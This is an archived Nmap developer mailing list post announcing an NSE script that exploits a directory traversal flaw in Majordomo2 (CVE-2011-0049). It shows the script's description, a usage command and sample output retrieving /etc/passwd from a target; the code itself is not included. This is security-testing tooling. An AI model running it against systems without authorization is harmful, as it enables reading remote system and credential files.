Home page logo
/

nmap-dev logo Nmap Development mailing list archives

http-majordomo2-dir-traversal.nse
From: Paulino Calderon <paulino () calderonpale com>
Date: Thu, 09 Jun 2011 18:33:47 -0700

Hello nmap-dev,

Here is my NSE script for exploiting the directory traversal vulnerability recently found in Majordomo2 (CVE-2011-0049) .

description = [[
Exploits a directory traversal vulnerability existing in Majordomo2 to retrieve remote files. (CVE-2011-0049).

Vulnerability originally discovered by Michael Brooks.

For more information about this vulnerability:
* http://www.mj2.org/
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0049
* http://www.exploit-db.com/exploits/16103/
]]

---
-- @usage
-- nmap -p80 --script http-majordomo2-dir-traversal <host/ip>
--
-- @output
-- PORT   STATE SERVICE
-- 80/tcp open  http    syn-ack
-- | http-majordomo2-dir-traversal: /etc/passwd was found:
-- |
-- | root:x:0:0:root:/root:/bin/bash
-- | bin:x:1:1:bin:/bin:/sbin/nologin
-- |
--
-- @args http-majordomo2-dir-traversal.rfile Remote file to download. Default: /etc/passwd -- @args http-majordomo2-dir-traversal.uri URI Path to mj_wwwusr. Default: /cgi-bin/mj_wwwusr -- @args http-majordomo2-dir-traversal.outfile If set it saves the downloaded file to this location.
--
-- Other arguments you might want to use with this script:
-- * http.useragent - Sets user agent
--



Cheers.

--
Paulino Calderón Pale
Web: http://calderonpale.com
Twitter: http://www.twitter.com/paulinocaIderon

Attachment: http-majordomo2-dir-traversal.nse
Description:

_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault